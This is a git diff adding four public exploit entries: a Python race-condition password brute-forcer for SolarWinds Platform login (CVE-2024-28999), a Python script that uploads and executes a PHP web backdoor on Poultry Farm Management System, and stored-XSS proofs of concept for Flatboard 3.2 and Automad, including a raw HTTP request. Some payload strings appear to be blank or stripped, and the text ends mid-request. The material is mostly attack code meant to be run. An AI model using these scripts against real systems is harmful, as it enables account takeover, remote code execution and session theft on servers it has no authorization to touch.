diff --git a/exploits/multiple/webapps/52055.py b/exploits/multiple/webapps/52055.py
new file mode 100755
index 000000000..dbeeff72a
--- /dev/null
+++ b/exploits/multiple/webapps/52055.py
@@ -0,0 +1,77 @@
+# Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition
+# CVE: CVE-2024-28999
+# Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions
+# Author: Elhussain Fathy, AKA 0xSphinx
+
+import requests
+import urllib3
+import asyncio
+import aiohttp
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')
+
+# host = '192.168.1.1'
+# username = "admin"
+# file_path = "passwords.txt"
+
+host = input("Enter the host: ")
+username = input("Enter the username: ")
+file_path = input("Enter the passwords file path: ")
+exploited = 0
+
+url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F"
+
+passwords = []
+with open(file_path, 'r') as file:
+ for line in file:
+ word = line.strip()
+ passwords.append(word)
+print(f"Number of tested passwords: {len(passwords)}")
+
+
+headers = {
+ 'Host': host,
+}
+
+sessions = []
+
+for _ in range(len(passwords)):
+ response = requests.get(url, headers=headers, verify=False, stream=False)
+ cookies = response.headers.get('Set-Cookie', '')
+ session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0]
+ sessions.append(session_id)
+
+
+
+
+async def send_request(session, username, password):
+ headers = {
+ 'Host': host,
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+ 'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE',
+ }
+
+ data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}'
+
+ async with aiohttp.ClientSession() as session:
+ async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response:
+ if response.status == 302:
+ global exploited
+ exploited = 1
+ print(f"Exploited Successfully Username: {username}, Password: {password}")
+
+
+async def main():
+ tasks = []
+ for i in range(len(passwords)):
+ session = sessions[i]
+ password = passwords[i]
+ task = asyncio.create_task(send_request(session, username, password))
+ tasks.append(task)
+ await asyncio.gather(*tasks)
+
+asyncio.run(main())
+
+if(not exploited):
+ print("Exploitation Failed")
\ No newline at end of file
diff --git a/exploits/php/webapps/52053.py b/exploits/php/webapps/52053.py
new file mode 100755
index 000000000..1b1c349bf
--- /dev/null
+++ b/exploits/php/webapps/52053.py
@@ -0,0 +1,62 @@
+# Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)
+# Date: 24-06-2024
+# CVE: N/A (Awaiting ID to be assigned)
+# Exploit Author: Jerry Thomas (w3bn00b3r)
+# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
+# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
+# Category: Web Application
+# Version: 1.0
+# Tested on: Windows 10 | Xampp v3.3.0
+# Vulnerable endpoint: http://localhost/farm/product.php
+
+import requests
+from colorama import Fore, Style, init
+
+# Initialize colorama
+init(autoreset=True)
+
+def upload_backdoor(target):
+ upload_url = f"{target}/farm/product.php"
+ shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"
+
+ # Prepare the payload
+ payload = {
+ 'category': 'CHICKEN',
+ 'product': 'rce',
+ 'price': '100',
+ 'save': ''
+ }
+
+ # PHP code to be uploaded
+ command = "hostname"
+ data = f""
+
+ # Prepare the file data
+ files = {
+ 'productimage': ('web-backdoor.php', data, 'application/x-php')
+ }
+
+ try:
+ print("Sending POST request to:", upload_url)
+ response = requests.post(upload_url, files=files, data=payload,
+verify=False)
+
+ if response.status_code == 200:
+ print("\nResponse status code:", response.status_code)
+ print(f"Shell has been uploaded successfully: {shell_url}")
+
+ # Make a GET request to the shell URL to execute the command
+ shell_response = requests.get(shell_url, verify=False)
+ print("Command output:", Fore.GREEN +
+shell_response.text.strip())
+ else:
+ print(f"Failed to upload shell. Status code:
+{response.status_code}")
+ print("Response content:", response.text)
+ except requests.RequestException as e:
+ print(f"An error occurred: {e}")
+
+if __name__ == "__main__":
+ target = "http://localhost" # Change this to your target
+ upload_backdoor(target)
\ No newline at end of file
diff --git a/exploits/php/webapps/52054.txt b/exploits/php/webapps/52054.txt
new file mode 100644
index 000000000..1ec4eb0c0
--- /dev/null
+++ b/exploits/php/webapps/52054.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2024-06-23
+# Exploit Author: tmrswrr
+# Category : Webapps
+# Vendor Homepage: https://flatboard.org/
+# Version: 3.2
+# PoC:
+
+1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum
+2-Click Add Forum and write in Information field your payload : ">
+3-Save it , you will be payload will be executed
\ No newline at end of file
diff --git a/exploits/php/webapps/52056.txt b/exploits/php/webapps/52056.txt
new file mode 100644
index 000000000..7ce58e607
--- /dev/null
+++ b/exploits/php/webapps/52056.txt
@@ -0,0 +1,89 @@
+# Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)
+# Date: 20-06-2024
+# Exploit Author: Jerry Thomas (w3bn00b3r)
+# Vendor Homepage: https://automad.org
+# Software Link: https://github.com/marcantondahmen/automad
+# Category: Web Application [Flat File CMS]
+# Version: 2.0.0-alpha.4
+# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11
+(bullseye)
+
+# Description
+
+A persistent (stored) cross-site scripting (XSS) vulnerability has been
+identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker
+to inject malicious JavaScript code into the template body. The injected
+code is stored within the flat file CMS and is executed in the browser of
+any user visiting the forum. This can result in session hijacking, data
+theft, and other malicious activities.
+
+# Proof-of-Concept
+
+*Step-1:* Login as Admin & Navigate to the endpoint
+http://localhost/dashboard/home
+
+*Step-2:* There will be a default Welcome page. You will find an option to
+edit it.
+
+*Step-3:* Navigate to Content tab or
+http://localhost/dashboard/page?url=%2F§ion=text & edit the block named
+***`Main`***
+
+*Step-4:* Enter the XSS Payload -
+
+
+*Request:*
+
+POST /_api/page/data HTTP/1.1
+
+Host: localhost
+Content-Length: 1822
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
+Accept: */*
+Origin: http://localhost
+Referer: http://localhost/dashboard/page?url=%2F§ion=text
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie:
+Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
+Connection: close
+
+------WebKitFormBoundaryzHmXQBdtZsTYQYCv
+Content-Disposition: form-data; name="__csrf__"
+
+49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
+------WebKitFormBoundaryzHmXQBdtZsTYQYCv
+Content-Disposition: form-data; name="__json__"
+
+{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing
+for
+xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"